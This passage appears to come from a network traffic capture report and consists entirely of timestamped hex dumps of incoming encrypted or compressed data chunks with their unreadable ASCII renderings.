                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10935INData Raw: d5 31 09 d3 98 0d a3 e6 f5 1f 42 97 70 cf f8 3d 11 f6 a9 0c 0f c9 a5 49 f9 f8 55 26 f4 c1 62 36 2a 60 16 c3 ca 38 74 b9 26 f6 7a 4b 4b 27 6e 43 0d a7 43 32 66 e3 b4 dc 09 51 a8 6d 6c 1a 5e 6c 62 13 b1 a8 a6 e6 5e 8c 93 90 99 b0 fb 64 04 a0 9f 2d be 5c 85 6f 64 04 99 f1 43 62 76 45 a8 5b 37 cf 97 73 79 02 8b 1f ef f9 52 9a ae b8 8d 19 1c 00 2b de 95 29 ac 78 2a 19 28 84 f8 47 1c 4c 96 6a b6 3f 03 a1 75 d0 dc 66 54 06 de 28 d0 5c a9 bd d2 2a e0 89 b9 4d a7 56 a1 21 50 d8 29 ad 4a c5 2f c2 4e 56 de ec 4e 0b c7 57 66 fc ef e9 cc 58 08 18 49 30 d3 f9 60 cc 6d f6 34 68 a9 82 43 f8 77 97 93 ce 6b 51 76 dc fc 97 e5 d1 3a 73 eb fd da 8f e3 d4 f1 05 f4 c1 1a 19 1f d6 63 77 03 75 f4 4f 7c 79 1a 91 20 6b 42 9c 78 f3 74 41 71 1a 5c e1 f1 af f0 73 c1 38 ee 77 8f 28 ab
                                                                                                                                                                                                                                    Data Ascii: 1Bp=IU&b6*`8t&zKK'nCC2fQml^lb^d-\odCbvE[7syR+)x*(GLj?ufT(\*MV!P)J/NVNWfXI0`m4hCwkQv:scwuO|y kBxtAq\s8w(
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10951INData Raw: b4 16 9e 6b 27 dd 19 fc e7 d9 75 68 79 0f 92 ff 11 48 01 02 99 d5 5c 81 19 fa 95 ca bb 84 54 37 84 6d 2b 51 5d 2b 2e 65 78 8a c9 ba ca 29 b0 81 83 d5 ae f7 88 2c 0e e2 9c 83 e2 ec 80 42 63 b3 03 a0 5c 8a 19 e5 6c 68 29 7e 31 a1 8d b1 9e 15 20 7b 44 7d 23 0a 84 5e a4 46 c8 54 31 99 7f c6 92 1b cd ca 4d 3f 47 09 10 ba 01 ee 32 b1 e0 d9 46 b1 89 7d 22 4b 20 ee 84 ac ff 1b c2 d6 f1 f2 59 4d 87 78 42 e8 f1 e7 48 fc d7 a6 74 35 05 48 b4 ae 08 f1 25 66 52 3d 5a 71 0d ab 6e e8 ca 1a 23 f9 c8 23 8d ac b6 4d 6d 10 23 ae 38 d4 79 6f 2f db f6 6d c9 a4 f5 6f 3f 7b bf a9 60 69 5b e6 2d 64 ac 20 aa 6e 87 95 24 c9 7e 6a 2b 14 48 18 0c be d9 14 30 40 59 9f ec 6b 00 66 5b f2 69 22 22 ad 2c 41 76 31 47 43 43 58 7a e1 ed a2 0a b0 dd 9f 86 4c f2 e6 e8 a5 19 37 87 93 89 84 f1
                                                                                                                                                                                                                                    Data Ascii: k'uhyH\T7m+Q]+.ex),Bc\lh)~1 {D}#^FT1M?G2F}"K YMxBHt5H%fR=Zqn##Mm#8yo/mo?{`i[-d n$~j+H0@Ykf[i"",Av1GCCXzL7
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10967INData Raw: 88 b7 bf 21 9e ef ae 51 c5 cd 42 1b 74 d0 e9 c3 09 42 07 64 4d 71 01 a9 48 82 94 3f 0f b1 06 dd 7a e2 36 82 0f 24 63 b5 42 a7 7e 98 c5 eb af 92 41 12 32 c1 21 13 be ee bb a2 ec 9a bc 15 d6 0e 11 9f d0 ad 5c c5 98 cf 81 d7 58 2d de 95 09 a9 63 e8 e0 53 2a 8b 1b 90 9e 0a b1 8b 3b 85 2f 81 01 32 b5 eb 55 3b d3 4e f9 24 b7 1a 4b 8e 8e 09 c8 81 be 41 ab 93 e5 ed 29 cf b2 ec 97 63 b0 f6 38 9a d5 2e b9 84 7f 67 61 6c ae ae 1b 07 f2 94 84 18 d2 bf 96 fb 98 21 f5 52 ce 10 df 51 84 de c8 a4 f7 7c ba 19 0b 21 ea bd 10 38 e5 bc 28 6d 79 b6 7e e1 f2 e5 92 55 d8 b3 e6 5c ec f6 14 f8 03 af cc 52 f0 f5 e2 7f d7 0d 2a 9a 63 23 b3 af 37 0a 56 90 c1 91 64 d4 2e 31 c4 dd cf 8a 2d 8f 45 79 1f f7 d1 19 84 d3 d9 5e 9e 02 7b 2c a5 b2 e9 e0 ac 45 7f 74 9d 5b 68 bc a4 f3 90 cf a4
                                                                                                                                                                                                                                    Data Ascii: !QBtBdMqH?z6$cB~A2!\X-cS*;/2U;N$KA)c8.gal!RQ|!8(my~U\R*c#7Vd.1-Ey^{,Et[h
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10983INData Raw: 2d a4 3b c7 08 5a 41 1c e9 66 31 d2 ae e6 94 88 75 f5 24 22 90 16 4d 5e aa 93 08 d2 e7 ce 10 ef f5 7c eb 02 5f 83 e0 c7 66 2c 8a 98 78 87 25 fa 12 23 52 aa 65 b4 5f 49 f7 90 89 de 29 60 08 3f 5f 2a 06 37 3b 95 3b 6f 85 94 ef 73 fe 6e 9f 10 13 f9 f2 30 58 05 4b 50 13 9e 7a a5 7a 22 c2 b3 ce c1 03 8b 3c f7 b8 2b 55 51 02 bc e0 e5 b0 99 cb aa 6d 19 39 9a b2 03 ea 27 26 73 6b de d7 f2 12 f7 fc 1f fa 10 0c 22 ec 63 05 cf 7f bf 4d d0 b9 b3 e3 49 36 81 71 f2 bd 63 d8 33 ff 45 27 10 7b 3a 60 1d 2a b2 1b 1e 1f c2 22 76 87 7a 75 bf b3 7f bf 21 27 d3 9b fa 92 be de 7b 72 f1 3a 96 db 61 1c 8e b4 9d ed 7f f8 28 91 a4 c8 0c 42 18 20 f9 51 90 42 5b 73 6d b7 27 60 bf 67 37 50 3f 85 b7 ef a1 5b e1 0a 51 64 14 65 43 20 c5 c4 54 78 de 7c 4c 07 dc 8a a6 98 c1 20 c7 de 68 a5
                                                                                                                                                                                                                                    Data Ascii: -;ZAf1u$"M^|_f,x%#Re_I)`?_*7;;osn0XKPzz"<+UQm9'&sk"cMI6qc3E'{:`*"vzu!'{r:a(B QB[sm'`g7P?[QdeC Tx|L h
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC10999INData Raw: 33 ff e7 d5 67 2d a0 88 eb 74 6e 07 c9 d9 64 65 ac 5a 6d e0 4d 71 07 30 e4 05 98 49 35 99 29 1a 20 10 39 7b 48 8f 4b f8 cf 36 38 b6 ad 0c 07 cd ea 55 4e 37 5a 55 5e 4b eb 20 a7 31 f3 6f 0e e5 f3 a2 dc 95 68 2d 7b 0f ed ce 67 b2 2d f5 3c ed bd 97 b6 3f e7 4f d1 0c 4f fc db 8c 2a 7b 4f 33 0b 21 ac 6f 17 2e d7 06 9d 2d 50 6e 2b 0a bd 25 d3 54 c2 f5 9c c4 09 af 27 90 df d3 d7 a3 4f 77 70 ec bd 64 2f e4 2d 4e 0f d8 9c c9 1c a6 f0 2e fc 9b ec 85 e7 e3 bb 42 49 b2 90 9f e9 2d 4e cb 25 fd 95 46 4f 99 f1 ba 7a d6 b0 a3 c6 6c cf 2a 24 6f 5a a7 91 aa c8 05 d8 cc e9 26 b2 a2 0a 1f 5f 6e ee ac 4b e4 fd e9 c1 14 e0 f6 3c 18 4f b6 89 a2 92 8b 62 75 b0 b1 e7 2d bc 34 d8 0a cb 23 03 53 fa 4a 53 e7 f9 53 34 72 d4 8e df 49 3c 3e 59 3b 93 3c 87 af 69 89 47 ff 32 45 fe 82 23
                                                                                                                                                                                                                                    Data Ascii: 3g-tndeZmMq0I5) 9{HK68UN7ZU^K 1oh-{g-<?OO*{O3!o.-Pn+%T'Owpd/-N.BI-N%FOzl*$oZ&_nK<Obu-4#SJSS4rI<>Y;<iG2E#
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11015INData Raw: 52 9a 8f 12 73 a0 20 48 aa 24 e4 46 da 29 97 df 1d 49 f9 b6 e3 71 58 c8 15 5f 3c e4 de c6 24 d1 c6 2b b6 90 09 57 64 c3 70 bf 09 e9 62 0d 34 40 80 db 5c 68 91 d3 88 2f e7 d6 4f 9a 74 90 34 52 ea b8 f3 8a fa 77 d3 b7 64 fc f9 66 41 15 dc 00 10 87 42 d1 3c 05 bf 2f a2 88 92 da b9 30 ed c1 6a 13 81 08 af 60 66 f8 c9 87 8f 15 0b 38 3b eb 71 81 d0 40 a6 ac 55 5f 8f 55 6c 8f 36 9b 3f f4 28 6c fc ec 97 2d ce 48 e4 0b db ac 3a e5 56 1b 31 d6 40 be c4 78 fd f1 ee ea 2b c4 92 65 b2 99 2f 08 09 51 8b 4d cc ab 4b 4f 9c f2 58 ef 2d 0f af 97 a1 24 aa 7b b8 75 9d 9c f8 c7 73 99 ab ab 82 fa 49 70 94 d6 90 f3 f8 9c 85 7e ca 06 d0 71 28 09 eb 0f 15 c4 b5 c5 93 31 80 dd a4 de e6 4e 4d 15 ee 58 a9 ec 8b a0 f8 ae 90 56 a1 42 4d 47 e0 10 6e 73 92 56 d8 7f 62 3d 0c 74 dc 16 c6
                                                                                                                                                                                                                                    Data Ascii: Rs H$F)IqX_<$+Wdpb4@\h/Ot4RwdfAB</0j`f8;q@U_Ul6?(l-H:V1@x+e/QMKOX-${usIp~q(1NMXVBMGnsVb=t
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11031INData Raw: 52 66 21 5b ea 44 05 a7 45 a9 64 62 18 6c d1 20 5c 52 58 00 e2 a3 d2 7d 1d d3 15 40 4f ee fc 77 1b a2 f9 af fc d0 ec e0 d4 02 31 8e 4e 5f 11 49 c6 7c 73 e6 86 02 c7 64 fd 6b d7 93 0f 3d ce 8c a4 06 b8 46 a3 fc 80 cd b4 9e d9 eb c8 ad 7e fd 53 1a 0b db 7d 0f 50 ac 9c 2d a0 32 4d 56 e1 a1 bd 9b b4 f3 d8 a6 7c 0a 18 18 09 a5 43 ec fb ea 1e 5e 73 a2 7f e1 01 47 18 13 10 8d d9 f9 2b 03 34 57 f8 3f c1 84 07 e7 46 cb 4d 8e 59 22 49 f1 54 e3 9f 0c e5 67 7c 92 fd 8c 89 75 a4 b5 a0 e4 79 8f 9d 2d 28 ff c6 1a 22 ba 21 88 d1 60 f5 5a 00 37 5b 5e 74 eb cc 31 56 95 c6 23 f6 fc 84 83 af b8 40 75 a9 d4 a6 ca 93 3e 72 cb 31 b9 3f 68 51 e9 f8 48 d2 35 bc 7f 54 d6 33 4f ad 66 4f 49 7d 54 b5 da 4b 5e fe aa 18 c4 4e 35 b0 7a 94 ff 78 a9 3e a4 f2 77 20 a8 a9 e0 7f 0f af 28 b5
                                                                                                                                                                                                                                    Data Ascii: Rf![DEdbl \RX}@Ow1N_I|sdk=F~S}P-2MV|C^sG+4W?FMY"ITg|uy-("!`Z7[^t1V#@u>r1?hQH5T3OfOI}TK^N5zx>w (
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11047INData Raw: 2d 09 f1 5a d2 76 11 7c 33 ca 8f e3 7e 03 0a 2c 70 96 a5 17 86 cc 3f ea d0 63 d5 c5 5f 53 6a bf 05 49 e1 b5 93 cd d5 c0 0d 48 cd f3 32 24 74 3c 43 90 80 d2 e0 54 d6 b9 cf 18 81 dd b4 8a 0d df 43 35 da 8c 50 c0 cc e2 c4 c1 0b 46 b5 90 e6 29 4d bd 33 07 1b f6 05 b0 f6 fb 1d d8 fa fd 8c 21 90 3b 68 f0 f1 e1 dd 1b f4 31 16 1b af 44 88 2e a9 8e bd 0d 80 ec e4 5f 75 32 b0 3f f7 32 be e5 dd 87 c8 a0 0d a4 a9 29 d0 e9 7f 3f e3 c5 69 b4 5d 41 f3 13 21 a1 1b 0b 57 d8 b6 37 2a a0 af 4f 08 9a 5b 3d 35 f7 2e f2 29 e6 84 fd 88 fb b4 c5 66 b4 ea 73 d1 15 30 e2 64 dd 9f 1c a3 47 75 c0 8f 41 54 5e 64 73 e6 82 04 f9 d3 40 55 56 3f 6e b0 3e b9 55 d6 34 6d fd 55 68 1d 93 57 0b f5 ee e4 73 41 c2 f7 13 50 f7 34 d4 16 cb bc 21 81 71 50 45 d6 e5 56 3a e8 70 5f 35 fb 96 ce 39 81
                                                                                                                                                                                                                                    Data Ascii: -Zv|3~,p?c_SjIH2$t<CTC5PF)M3!;h1D._u2?2)?i]A!W7*O[=5.)fs0dGuAT^ds@UV?n>U4mUhWsAP4!qPEV:p_59
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11063INData Raw: 18 ab 07 d2 c2 e4 9a 9b 79 03 18 4b ed bb f2 78 89 03 c5 1e bc 95 94 84 c8 fc ed b2 d7 00 b6 d3 e8 df 31 5d 8f dc 8a 5b 70 12 90 22 bf 7d c1 c4 05 23 9b 53 12 2a ef ad b2 af a1 54 47 bd 5e 74 e4 59 0d 4d 64 17 46 bd c4 2f 6d af 07 10 b8 e1 90 08 00 a6 14 47 ad e8 1d 8c fe b2 94 1c fe 79 20 74 52 7e d7 4e 3a e4 5f 79 13 96 aa d0 b1 8b 11 38 2c 32 12 e4 52 a1 ad 3e 26 86 d5 d7 ba c9 9d 9c 9e b1 25 0d 64 2c 46 48 52 d0 cb 7d 71 96 64 57 79 a3 a3 6d 6e 57 df 7c eb 86 d9 1c f7 ea d6 72 49 62 7c b9 ed fc 5d 47 83 4b 14 2b a1 a3 91 62 88 97 11 05 cd cf a3 6b 34 59 97 1a 0f 40 16 9d 07 cc 55 09 3e 6d 5b ef 5f d3 bc dd 50 7a cf 59 83 92 d9 bd 9c a0 e1 56 09 8b 6b d7 b2 5e 2b c2 8a 98 5b d2 1d 5b 6b 68 eb f5 66 21 8d 47 ae 79 88 a1 86 ca 37 e8 a2 c3 b7 fa 2c f7 93
                                                                                                                                                                                                                                    Data Ascii: yKx1][p"}#S*TG^tYMdF/mGy tR~N:_y8,2R>&%d,FHR}qdWymnW|rIb|]GK+bk4Y@U>m[_PzYVk^+[[khf!Gy7,
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11079INData Raw: 18 81 81 46 74 31 78 71 6e d3 10 0e 30 1c 4c 0e 46 e3 bb 28 3e b0 ed c7 87 9b 78 0a 99 fa 95 d7 9d a0 a3 cd c9 aa 7b a9 a3 24 8d c8 b9 0d e1 5a c3 a5 aa 42 a3 79 d0 c3 1b 25 74 ce 55 a2 e6 e2 e2 9f c2 2c ed 3d 2e 0c ce e9 6b 6b aa a3 a7 9b 25 3b 1a ee 5c 88 ea 39 cd 9a f6 cf 34 bd 99 55 e3 4b d5 94 4a 87 23 43 77 9a b8 f8 53 c0 c3 0b f3 25 da 80 98 7c dd a5 38 fc cf fd 89 25 b1 7f df 72 0d de 12 bf df 75 5b e3 4f 8e 23 ef 90 c6 a2 31 d9 e1 ff bd 28 7d ca 50 8a e1 ed 93 8b 89 cd 1a 51 a7 12 cb 0f 5b fe c0 44 6c 27 1c ef 97 db 6b e4 69 96 b6 9b e9 ad 3d a2 53 4e fb 60 d0 0a 2c 34 79 fb 57 28 5a 28 bf 94 b6 f0 c5 3e 29 d3 f3 90 ca f7 7d 86 fd ec c8 60 e7 f5 87 5f ed 87 2e 14 31 22 9a 22 61 b6 16 c9 70 a1 48 44 ca 18 87 ec 31 84 77 16 9a 94 3d 87 a3 57 57 35
                                                                                                                                                                                                                                    Data Ascii: Ft1xqn0LF(>x{$ZBy%tU,=.kk%;\94UKJ#CwS%|8%ru[O#1(}PQ[Dl'ki=SN`,4yW(Z(>)}`_.1""apHD1w=WW5
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11095INData Raw: 0c db 4a 4e 6a a7 20 b8 8f b4 3e eb 1a b2 90 31 f6 c9 a6 89 a6 4e b2 c7 c9 75 d9 7d 76 5d a7 fc 9f 08 ee 00 86 94 db 40 63 cc 3e 23 d7 08 bc 8b 9b ff 7e f8 4c 1e 23 71 3f 89 88 08 86 3e 5e 3e db 5c b4 f9 6d bb 13 57 ce da 6b b1 db 5f 0d 36 13 94 5d b4 e5 01 21 41 d3 cf eb 5a d4 fc 6f 4c df 85 f5 ca c0 1c a4 93 f6 c1 74 e2 94 5a c2 b9 cf 91 4c 30 d5 8a ee f1 47 97 5f 2d 66 8d b6 2d 92 d9 e9 52 45 64 ff 78 4e c2 65 da 80 9e d4 97 8b c8 7b 97 89 03 50 5b be 73 62 e7 02 1f 14 e5 b1 19 36 23 a4 eb 7c 85 bb 8f 12 19 51 5e b2 3f 15 74 09 24 27 06 70 fe 9e 9a df 01 91 57 09 23 71 3a ed eb 64 bd b1 32 24 2f a9 79 d9 6c c0 8e d6 53 38 90 ec 84 f0 61 d9 7f fc 54 2a c4 cc 76 f0 98 8e fd ab 2b 76 2c c4 f9 90 89 2b 23 7e 11 55 87 3e 38 7c 40 cc d7 6a c8 7a 1a 32 4d 1a
                                                                                                                                                                                                                                    Data Ascii: JNj >1Nu}v]@c>#~L#q?>^>\mWk_6]!AZoLtZL0G_-f-REdxNe{P[sb6#|Q^?t$'pW#q:d2$/ylS8aT*v+v,+#~U>8|@jz2M
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11111INData Raw: 79 fd 28 f7 65 9e 74 47 6e 06 7f 03 b0 e9 f2 c5 c1 bd e5 39 04 d3 53 28 80 3c 6b 5c c6 42 56 87 4b c0 7b bd 84 83 3a 17 ff 90 ae 22 e2 c7 38 59 f3 3e 8d db 95 a4 56 aa ba 33 1e 0f 44 ac 8a 40 83 ac f6 ab 46 41 3d 20 dc f4 b0 1b 24 c9 7c 5c f3 56 c7 d0 ec 94 dc 50 73 6d e4 b5 09 e0 75 18 be f7 9d 66 9a 6a 88 3f 1e 79 93 3c e8 03 5d 47 ae 4f 01 9a 3c 08 68 25 9a 0b 78 53 f1 4c 99 7a 85 f7 8c 29 f8 d8 72 5b b1 53 06 b6 47 a2 56 1c 56 3e ec 66 ee 2e 9e c7 90 f8 c8 71 fa 88 85 1a 22 e0 a8 b6 50 ed 3d f3 3d 28 60 f9 7c 86 48 c7 5b ac 01 b8 c6 66 2f da fd e2 03 a5 77 4f 93 f5 09 4a 2c 47 8d 85 e4 0b 4d f2 45 34 b4 1e d1 18 df 22 03 a7 15 f1 12 25 2e 26 b1 cf cb 41 3d b2 88 ab cc 20 d9 ef dc e7 59 1f 34 d7 96 5e 11 dd d9 54 d9 7e 4b 06 a5 6b 14 f6 d9 3d 7d 33 51
                                                                                                                                                                                                                                    Data Ascii: y(etGn9S(<k\BVK{:"8Y>V3D@FA= $|\VPsmufj?y<]GO<h%xSLz)r[SGVV>f.q"P==(`|H[f/wOJ,GME4"%.&A= Y4^T~Kk=}3Q
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11127INData Raw: 97 3a f0 82 c7 52 c9 db e5 ad ca 02 1d b1 84 80 f6 cc c1 b1 be ba 95 e1 46 9e b5 9d b1 fb 25 13 75 c1 a6 eb 66 94 00 6d 8e f3 fe 6b 95 4c c2 3e af c4 f5 e2 c3 20 a3 73 2b 33 aa 65 4d af a4 c3 13 5d 2a 68 5b 14 cf f0 4c 37 01 55 62 36 ec de 62 83 27 81 a5 36 45 47 61 30 f0 28 3b 46 2f 59 cc df ed c7 50 23 dd ea b1 00 ad 3d 98 3d ec eb e0 a6 93 57 27 5a 3e ac 33 20 d2 b2 1e c7 c0 2a b3 2d f2 22 32 d4 40 d2 45 db 5d 18 a4 e6 e3 38 ad 06 7e 47 7b 4d d3 08 2a 12 fb 69 30 ab 8c b9 6b d6 a1 df fc 1c b2 8b 58 48 21 3f 3a b1 c8 98 5f 57 42 1d e8 38 8d fa 58 eb e0 9d eb 33 50 3a b1 85 23 e8 92 bc 2f a4 89 94 38 10 d5 ac 8f e5 ac 62 0a 3d e4 3c 40 fe 84 40 1b 55 23 bb 0a a3 34 2d b9 21 b1 87 f3 c5 e5 8b d8 e4 fc 67 73 5f 67 cc 2e 2b 64 35 13 90 62 7e 57 e9 f8 17 88
                                                                                                                                                                                                                                    Data Ascii: :RF%ufmkL> s+3eM]*h[L7Ub6b'6EGa0(;F/YP#==W'Z>3 *-"2@E]8~G{M*i0kXH!?:_WB8X3P:#/8b=<@@U#4-!gs_g.+d5b~W
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11143INData Raw: 45 77 83 1d 4e 68 01 47 33 91 e2 1f 89 5f ce 98 00 38 94 80 23 79 e4 e2 05 68 94 9c da df f1 d0 62 8c 3c 27 78 74 8a 90 2c 14 6f 3a ab 81 0f cc a8 b0 de 2d 75 f0 af ef 1c 9b a6 a8 57 c4 b8 69 5e e4 a4 77 a1 7c 2d 89 46 53 d0 0f a7 69 25 38 25 9c 25 99 4a 89 4c 21 e4 fa b4 84 c5 3d 59 c6 ed b2 a8 3d a6 1e b5 b6 34 50 c0 c3 85 84 2a da de 72 07 ff 8a dc 8f a9 96 01 ac 11 c1 31 d2 47 e8 74 e3 1d 9b 73 3c 3c 75 f9 b4 11 17 e3 f6 7f 66 8d ba 94 4b c9 44 70 f7 65 5f 65 d3 3c 9c e1 47 3b 41 e2 ba 2e a2 50 ad 1d 8f c9 37 48 8f 65 d0 57 51 65 c0 c3 44 05 98 40 ff d2 7b f1 39 bf 99 d6 12 e8 85 00 3c 31 43 0d 8c bb fd 74 48 6c 2c e3 44 5c 20 f1 f6 c7 f9 af 87 71 60 45 db 02 53 f5 3f 70 86 d6 a0 96 2a 62 e5 ea 05 94 64 da fc 2a 3c 4e 40 28 b8 35 89 2f a8 73 5e 3b fe
                                                                                                                                                                                                                                    Data Ascii: EwNhG3_8#yhb<'xt,o:-uWi^w|-FSi%8%%JL!=Y=4P*r1Gts<<ufKDpe_e<G;A.P7HeWQeD@{9<1CtHl,D\ q`ES?p*bd*<N@(5/s^;
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11159INData Raw: 69 83 5c b6 85 3e 72 3b 1a 56 7d 17 d4 b0 ff c3 f0 d3 76 d9 d5 13 97 e4 69 50 28 f9 01 df 79 4f 0b f3 35 a7 66 02 45 34 a0 50 7d d6 be 12 e8 0a 6a 1c f6 21 9e 34 5e f8 ab 0b b6 22 00 38 b2 32 6f 4e 31 d7 f0 91 d7 36 d6 d9 2c c1 96 56 ea 19 f3 75 60 41 5b 51 93 b7 56 76 01 aa 40 39 80 20 a9 db 8b 26 e0 46 dd 1e a8 73 61 8a 06 2e 3d cb 87 a0 bf fd 89 8c 2c 01 6b de 91 59 07 9a e7 0a 98 bf e6 35 9c fa 0f 72 39 38 51 d2 92 99 d1 55 3a 76 e5 d1 17 9c 53 eb 26 b7 64 22 65 51 a1 fb 33 a0 68 46 c8 41 80 7b be e0 4f a9 42 38 fe 6b be f4 1a 6d 59 21 1b a6 88 eb f0 3c 15 be d1 af 38 51 00 34 6d 36 a9 42 59 3d 69 5e 29 68 42 48 b7 5c b5 3d dd df 8e 40 cd f0 a9 8b 0f 0a e5 e2 22 4a 2d 00 4e 9e 6a 8e 5e 8b 16 5a f4 ae 05 e5 91 49 ca c5 6a 63 9d 37 74 fa c7 43 19 15 10
                                                                                                                                                                                                                                    Data Ascii: i\>r;V}viP(yO5fE4P}j!4^"82oN16,Vu`A[QVv@9 &Fsa.=,kY5r98QU:vS&d"eQ3hFA{OB8kmY!<8Q4m6BY=i^)hBH\=@"J-Nj^ZIjc7tC
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11175INData Raw: e3 35 10 45 1e fd 4b 80 42 28 66 54 c4 cb f9 58 8c a9 57 99 98 8f 9a 8c 71 3b 7f db 73 58 e6 cd 27 91 71 36 eb 6d 91 1c 3e 69 70 51 1d a3 8d a8 5f 77 1f 38 2e f4 54 02 a9 71 a8 46 1c f8 04 5a 70 07 42 37 28 ab d0 68 4b 31 b4 18 67 a8 da 01 19 13 ae c6 f4 63 7a f5 24 5d 75 af 9a a7 5e f0 16 a6 64 6b 14 ca 58 84 6e d8 1a 67 b3 0a df 68 b7 78 6b 83 05 e5 90 26 9a 6a c7 70 db 39 f5 bc a3 6d 2c b4 87 b9 6a 91 73 53 dd 89 de 7b 9b 0a 01 6e 69 c0 9b 41 bd a9 9b 60 b8 fa cb e4 17 ec 25 94 8b 6e 1b 21 e6 41 51 c0 22 49 66 ee 16 5c e6 95 6d 4e 53 0c 51 69 d4 3b f0 c5 d6 8e 1f ae f6 ac 01 11 86 4b b8 25 35 8f ef 50 3b 95 f7 e2 97 69 c7 c1 6e dc 65 95 79 d0 ff e4 b2 b2 a6 25 ba ae c4 8c 56 25 3f 1b 81 2b a3 da 23 7a 34 d7 4b b2 ea a5 be 11 85 f2 6a 46 05 6b ab 84 d3
                                                                                                                                                                                                                                    Data Ascii: 5EKB(fTXWq;sX'q6m>ipQ_w8.TqFZpB7(hK1gcz$]u^dkXnghxk&jp9m,jsS{niA`%n!AQ"If\mNSQi;K%5P;iney%V%?+#z4KjFk
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11191INData Raw: 87 bb 24 e5 af 08 35 11 89 73 eb 8c be ee 87 ac 22 1f 7a 07 69 0b 52 cb d4 01 75 82 28 07 e9 9c eb 14 d7 99 04 41 33 c8 a3 2d ad 16 51 82 ed 28 e0 72 31 a6 e6 f8 28 c8 d1 2b 51 00 18 3a 47 94 ee 5f 7c 39 5c 01 63 01 99 40 74 1b 0b 81 10 4b c4 0a 0a 77 87 de 63 d2 48 77 80 96 f3 e5 0e a8 51 bf a3 aa e2 e6 c7 2e ca c6 3d 39 05 f0 02 27 fe 5f d4 c9 b1 94 80 5a f5 7e 0c 4e 8b cb e6 dd 1b 4b 44 4e e2 e9 3f 69 7c 6c a5 dc 24 9a f5 a6 81 f5 f0 5d 9a d5 56 95 2a 73 00 bf f7 77 20 72 d9 6d 22 bb 6e 12 80 4c 86 1f 35 1b 1f c0 9f 53 f0 0e 99 08 a5 8a a7 ce e1 79 19 c1 03 e5 91 77 34 8a 1d 61 fe 38 7c 5d b0 95 e6 67 c2 d0 7b 5b c0 8a 16 7e a5 35 ce 67 28 d6 67 60 c8 76 ab 76 07 23 d8 a1 1d f0 06 b4 0b 05 83 dc 8a e8 20 8a 74 da 70 9d dc 96 a1 11 11 7c 96 26 4e 4b e6
                                                                                                                                                                                                                                    Data Ascii: $5s"ziRu(A3-Q(r1(+Q:G_|9\c@tKwcHwQ.=9'_Z~NKDN?i|l$]V*sw rm"nL5Syw4a8|]g{[~5g(g`vv# tp|&NK
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11207INData Raw: 66 08 62 9b 72 27 e9 cd 38 54 88 da 7f 2e 19 2d 0d 97 8d 8b f5 0a 1e aa 11 33 9f 87 f3 d0 27 37 68 49 26 13 c5 52 8c aa 95 f1 c8 d6 f8 04 cb 86 64 ae 17 d0 98 7f c1 56 00 74 ef 26 68 04 1b 79 cf dd 8a c2 59 d7 0a 33 fa 55 85 03 e5 a3 e4 ba 63 ce 35 2c f5 ee 76 67 60 b3 2b 84 41 2b d8 a8 14 f0 e3 03 85 3d 89 57 74 34 4a 4a 19 fb c8 f5 9d 59 b1 3d d5 75 eb 54 18 11 16 08 32 a9 22 ab 6d c1 4c d7 df 10 d9 50 4c e1 d0 fb 96 64 b2 cf cb 39 cb bd a0 d4 06 2e 52 c6 9c cb 88 84 fb 00 16 6c 10 6d b5 e4 0e b3 90 cc 17 45 3e dd 29 5b 3b d9 1f 9a d9 4a 96 ce 7c 02 39 10 27 13 2a 57 08 52 27 b4 86 ec a4 ac d0 6b d2 58 49 7c 44 51 53 b2 28 ea ca eb 81 3c 5d 0d 53 68 9c f8 b0 8a a3 bf d1 8e a7 a9 83 50 4e 3c 8e 49 f9 3b 45 e5 08 38 de c9 f2 10 3f 04 1a d7 35 3b fb de 22
                                                                                                                                                                                                                                    Data Ascii: fbr'8T.-3'7hI&RdVt&hyY3Uc5,vg`+A+=Wt4JJY=uT2"mLPLd9.RlmE>)[;J|9'*WR'kXI|DQS(<]ShPN<I;E8?5;"
                                                                                                                                                                                                                                    2022-10-04 05:10:06 UTC11223INData Raw: 07 a6 75 30 69 14 02 27 8a 8b 4d 9e 84 45 7f f7 a1 d5 ee 09 3b 1a 8a 65 aa c2 75 cf 31 17 00 79 a2 41 76 91 72 99 29 00 e8 db d0 45 99 53 7d fc df e4 13 de 84 50 42 57 6d d0 41 5d 44 30 83 0b 35 93 2b 2a 30 fb d5 8b 91 b4 2f 2e 79 53 4b 61 42 6c 3d da 0d 1b dc ed bd c5 3a d0 32 9b 0f 18 db 9b e9 88 93 45 e8 72 b6 90 00 fb bf e3 0a 19 06 04 13 f8 32 81 68 89 34 27 56 01 65 97 e3 77 01 57 ca ee a0 51 f4 8a 7b 61 79 e0 59 d9 d5 ea 70 ae b7 a7 15 64 a4 de 97 3c 55 c9 5b 7b 16 ea 74 08 90 8e 19 68 9a a2 bb e0 64 da 55 ca 85 0b 76 c7 79 c1 92 ca 72 40 53 09 cf 3a f6 8c 5a cb 52 f5 5b af e1 d9 0b eb 79 25 73 5e c9 c5 58 83 a0 4c 3a 65 b2 19 42 f2 95 3b 83 7b 38 cb f0 3a 25 60 03 6a 6f b1 a5 41 2b fe ff 7c 37 97 ce c1 d8 c4 96 e8 1d 51 2e 54 e8 74 e2 f8 a4 23 4c
                                                                                                                                                                                                                                    Data Ascii: u0i'ME;eu1yAvr)ES}PBWmA]D05+*0/.ySKaBl=:2Er2h4'VewWQ{ayYpd<U[{thdUvyr@S:ZR[y%s^XL:eB;{8:%`joA+|7Q.Tt#L
